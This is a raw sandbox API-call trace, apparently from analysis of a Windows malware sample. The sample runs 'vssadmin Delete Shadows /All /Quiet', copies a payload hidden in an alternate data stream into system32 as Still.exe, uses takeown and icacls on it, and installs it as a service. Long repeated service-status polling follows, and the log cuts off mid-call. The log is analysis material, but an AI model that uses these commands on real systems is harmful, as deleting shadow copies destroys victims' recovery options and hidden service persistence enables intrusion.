RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x220) returned 0x849eb0 [0117.782] GetWindowsDirectoryW (in: lpBuffer=0x849eb0, uSize=0xc | out: lpBuffer="C:\\WINDOWS") returned 0xa [0117.782] lstrcpyW (in: lpString1=0x849ec6, lpString2="system32" | out: lpString1="system32") returned="system32" [0117.782] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x28) returned 0x8497f8 [0117.782] lstrcpyW (in: lpString1=0x849ed8, lpString2="Still" | out: lpString1="Still") returned="Still" [0117.782] lstrcatW (in: lpString1="C:\\WINDOWS\\system32\\Still", lpString2=".exe" | out: lpString1="C:\\WINDOWS\\system32\\Still.exe") returned="C:\\WINDOWS\\system32\\Still.exe" [0117.783] PathFileExistsW (pszPath="C:\\WINDOWS\\system32\\Still.exe") returned 0 [0117.783] lstrlenW (lpString="C:\\WINDOWS\\system32\\Still.exe") returned 29 [0117.783] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x242) returned 0x84a0d8 [0117.783] lstrcpyW (in: lpString1=0x84a100, lpString2="vssadmin.exe Delete Shadows /All /Quiet" | out: lpString1="vssadmin.exe Delete Shadows /All /Quiet") returned="vssadmin.exe Delete Shadows /All /Quiet" [0117.784] GetModuleHandleA (lpModuleName="kernel32") returned 0x772d0000 [0117.784] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x77326eb0 [0117.784] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0117.784] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\WINDOWS\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19feb4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fef8 | out: lpCommandLine="C:\\WINDOWS\\system32\\vssadmin.exe Delete Shadows /All /Quiet", lpProcessInformation=0x19fef8*(hProcess=0x268, hThread=0x260, dwProcessId=0xf8c, dwThreadId=0xfa0)) returned 1 [0118.666] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 1 [0118.666] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0xffffffff) returned 0x0 [0134.273] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x19ff28 | out: lpExitCode=0x19ff28*=0x2) returned 1 [0134.772] CloseHandle (hObject=0x260) returned 1 [0134.772] CloseHandle (hObject=0x268) returned 1 [0134.773] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still:bin" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still:bin"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0134.774] GetFileSize (in: hFile=0x268, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x114190 [0134.775] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x114192) returned 0x2402020 [0134.779] ReadFile (in: hFile=0x268, lpBuffer=0x2402020, nNumberOfBytesToRead=0x114190, lpNumberOfBytesRead=0x19ff04, lpOverlapped=0x0 | out: lpBuffer=0x2402020*, lpNumberOfBytesRead=0x19ff04*=0x114190, lpOverlapped=0x0) returned 1 [0134.875] CloseHandle (hObject=0x268) returned 1 [0134.877] CreateFileW (lpFileName="C:\\WINDOWS\\system32\\Still.exe" (normalized: "c:\\windows\\system32\\still.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0134.879] WriteFile (in: hFile=0x268, lpBuffer=0x2402020*, nNumberOfBytesToWrite=0x114190, lpNumberOfBytesWritten=0x19ff10, lpOverlapped=0x0 | out: lpBuffer=0x2402020*, lpNumberOfBytesWritten=0x19ff10*=0x114190, lpOverlapped=0x0) returned 1 [0134.956] SetEndOfFile (hFile=0x268) returned 1 [0134.957] CloseHandle (hObject=0x268) returned 1 [0135.034] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x2402020 | out: hHeap=0x820000) returned 1 [0135.041] _snwprintf (in: _Dest=0x84a100, _Count=0x121, _Format="takeown.exe /F %s" | out: _Dest="takeown.exe /F C:\\WINDOWS\\system32\\Still.exe") returned 44 [0135.042] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\WINDOWS\\system32\\takeown.exe /F C:\\WINDOWS\\system32\\Still.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19feb4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fef8 | out: lpCommandLine="C:\\WINDOWS\\system32\\takeown.exe /F C:\\WINDOWS\\system32\\Still.exe", lpProcessInformation=0x19fef8*(hProcess=0x260, hThread=0x268, dwProcessId=0xd80, dwThreadId=0x798)) returned 1 [0136.083] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0139.757] GetExitCodeProcess (in: hProcess=0x260, lpExitCode=0x19ff28 | out: lpExitCode=0x19ff28*=0x0) returned 1 [0139.757] CloseHandle (hObject=0x268) returned 1 [0139.757] CloseHandle (hObject=0x260) returned 1 [0139.758] _snwprintf (in: _Dest=0x84a100, _Count=0x121, _Format="icacls.exe %s /reset" | out: _Dest="icacls.exe C:\\WINDOWS\\system32\\Still.exe /reset") returned 47 [0139.758] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\WINDOWS\\system32\\icacls.exe C:\\WINDOWS\\system32\\Still.exe /reset", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19feb4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fef8 | out: lpCommandLine="C:\\WINDOWS\\system32\\icacls.exe C:\\WINDOWS\\system32\\Still.exe /reset", lpProcessInformation=0x19fef8*(hProcess=0x268, hThread=0x260, dwProcessId=0x868, dwThreadId=0x564)) returned 1 [0140.089] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0xffffffff) returned 0x0 [0142.318] GetExitCodeProcess (in: hProcess=0x268, lpExitCode=0x19ff28 | out: lpExitCode=0x19ff28*=0x0) returned 1 [0142.319] CloseHandle (hObject=0x260) returned 1 [0142.319] CloseHandle (hObject=0x268) returned 1 [0142.319] lstrlenW (lpString="C:\\WINDOWS\\system32\\Still.exe") returned 29 [0142.319] lstrlenW (lpString="") returned 0 [0142.319] lstrlenW (lpString="-s") returned 2 [0142.319] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x44) returned 0x830ff0 [0142.321] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x2) returned 0x849588 [0142.591] CreateServiceW (in: hSCManager=0x849588, lpServiceName="Still", lpDisplayName="Still", dwDesiredAccess=0xf01ff, dwServiceType=0x10, dwStartType=0x3, dwErrorControl=0x0, lpBinaryPathName="C:\\WINDOWS\\system32\\Still.exe -s", lpLoadOrderGroup=0x0, lpdwTagId=0x0, lpDependencies=0x0, lpServiceStartName=0x0, lpPassword=0x0 | out: lpdwTagId=0x0) returned 0x849538 [0142.642] StartServiceW (hService=0x849538, dwNumServiceArgs=0x0, lpServiceArgVectors=0x0) returned 1 [0155.827] Sleep (dwMilliseconds=0x64) [0155.939] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0155.940] ControlService (in: hService=0x849538, dwControl=0x1, lpServiceStatus=0x19fee0 | out: lpServiceStatus=0x19fee0*(dwServiceType=0x10, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0157.078] Sleep (dwMilliseconds=0x3e8) [0158.448] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0158.449] Sleep (dwMilliseconds=0x3e8) [0159.494] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0159.494] Sleep (dwMilliseconds=0x3e8) [0160.516] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0160.516] Sleep (dwMilliseconds=0x3e8) [0161.617] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0161.646] Sleep (dwMilliseconds=0x3e8) [0162.849] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0162.850] Sleep (dwMilliseconds=0x3e8) [0163.997] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0163.998] Sleep (dwMilliseconds=0x3e8) [0165.071] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0165.072] Sleep (dwMilliseconds=0x3e8) [0166.187] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0166.187] Sleep (dwMilliseconds=0x3e8) [0167.193] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0167.193] Sleep (dwMilliseconds=0x3e8) [0168.224] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0168.224] Sleep (dwMilliseconds=0x3e8) [0170.162] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0170.162] Sleep (dwMilliseconds=0x3e8) [0171.341] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0171.343] Sleep (dwMilliseconds=0x3e8) [0172.475] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0172.476] Sleep (dwMilliseconds=0x3e8) [0173.645] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0173.646] Sleep (dwMilliseconds=0x3e8) [0174.774] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0174.775] Sleep (dwMilliseconds=0x3e8) [0175.838] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0175.838] Sleep (dwMilliseconds=0x3e8) [0176.948] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0176.949] Sleep (dwMilliseconds=0x3e8) [0178.107] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0178.108] Sleep (dwMilliseconds=0x3e8) [0179.285] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0179.286] Sleep (dwMilliseconds=0x3e8) [0180.294] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0180.294] Sleep (dwMilliseconds=0x3e8) [0181.305] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0181.306] Sleep (dwMilliseconds=0x3e8) [0182.436] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0182.436] Sleep (dwMilliseconds=0x3e8) [0183.561] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0183.562] Sleep (dwMilliseconds=0x3e8) [0184.810] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0184.810] Sleep (dwMilliseconds=0x3e8) [0185.984] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0185.985] Sleep (dwMilliseconds=0x3e8) [0187.147] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0187.148] Sleep (dwMilliseconds=0x3e8) [0188.361] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0188.362] Sleep (dwMilliseconds=0x3e8) [0189.547] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0189.547] Sleep (dwMilliseconds=0x3e8) [0190.680] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0190.681] Sleep (dwMilliseconds=0x3e8) [0191.844] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0191.844] Sleep (dwMilliseconds=0x3e8) [0193.196] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0193.196] Sleep (dwMilliseconds=0x3e8) [0194.440] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0194.441] Sleep (dwMilliseconds=0x3e8) [0195.474] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0195.474] Sleep (dwMilliseconds=0x3e8) [0196.563] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0196.564] Sleep (dwMilliseconds=0x3e8) [0197.646] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0197.664] Sleep (dwMilliseconds=0x3e8) [0198.757] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0198.758] Sleep (dwMilliseconds=0x3e8) [0199.855] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0199.856] Sleep (dwMilliseconds=0x3e8) [0201.119] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0201.120] Sleep (dwMilliseconds=0x3e8) [0202.231] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0202.231] Sleep (dwMilliseconds=0x3e8) [0203.339] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0203.340] Sleep (dwMilliseconds=0x3e8) [0204.509] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0204.509] Sleep (dwMilliseconds=0x3e8) [0205.787] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0205.787] Sleep (dwMilliseconds=0x3e8) [0206.930] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0206.931] Sleep (dwMilliseconds=0x3e8) [0208.414] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0208.414] Sleep (dwMilliseconds=0x3e8) [0209.638] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0209.639] Sleep (dwMilliseconds=0x3e8) [0210.873] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0210.873] Sleep (dwMilliseconds=0x3e8) [0212.099] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0212.100] Sleep (dwMilliseconds=0x3e8) [0213.583] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0213.583] Sleep (dwMilliseconds=0x3e8) [0214.808] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0214.808] Sleep (dwMilliseconds=0x3e8) [0215.979] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0215.979] Sleep (dwMilliseconds=0x3e8) [0217.126] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0217.127] Sleep (dwMilliseconds=0x3e8) [0218.278] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0218.278] Sleep (dwMilliseconds=0x3e8) [0219.480] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0219.480] Sleep (dwMilliseconds=0x3e8) [0220.891] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0220.892] Sleep (dwMilliseconds=0x3e8) [0222.046] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0222.046] Sleep (dwMilliseconds=0x3e8) [0223.229] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0223.229] Sleep (dwMilliseconds=0x3e8) [0224.421] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0224.421] Sleep (dwMilliseconds=0x3e8) [0226.376] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0226.376] Sleep (dwMilliseconds=0x3e8) [0227.488] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0227.488] Sleep (dwMilliseconds=0x3e8) [0228.598] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0228.599] Sleep (dwMilliseconds=0x3e8) [0230.048] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0230.049] Sleep (dwMilliseconds=0x3e8) [0231.269] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0231.269] Sleep (dwMilliseconds=0x3e8) [0232.500] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0232.500] Sleep (dwMilliseconds=0x3e8) [0233.532] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0233.532] Sleep (dwMilliseconds=0x3e8) [0234.661] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0234.662] Sleep (dwMilliseconds=0x3e8) [0235.846] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0235.847] Sleep (dwMilliseconds=0x3e8) [0237.239] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0237.239] Sleep (dwMilliseconds=0x3e8) [0238.393] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0238.393] Sleep (dwMilliseconds=0x3e8) [0239.506] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, pcbBytesNeeded=0x19ff18 | out: lpBuffer=0x19fee0, pcbBytesNeeded=0x19ff18) returned 1 [0239.506] Sleep (dwMilliseconds=0x3e8) [0240.856] QueryServiceStatusEx (in: hService=0x849538, InfoLevel=0x0, lpBuffer=0x19fee0, cbBufSize=0x24, 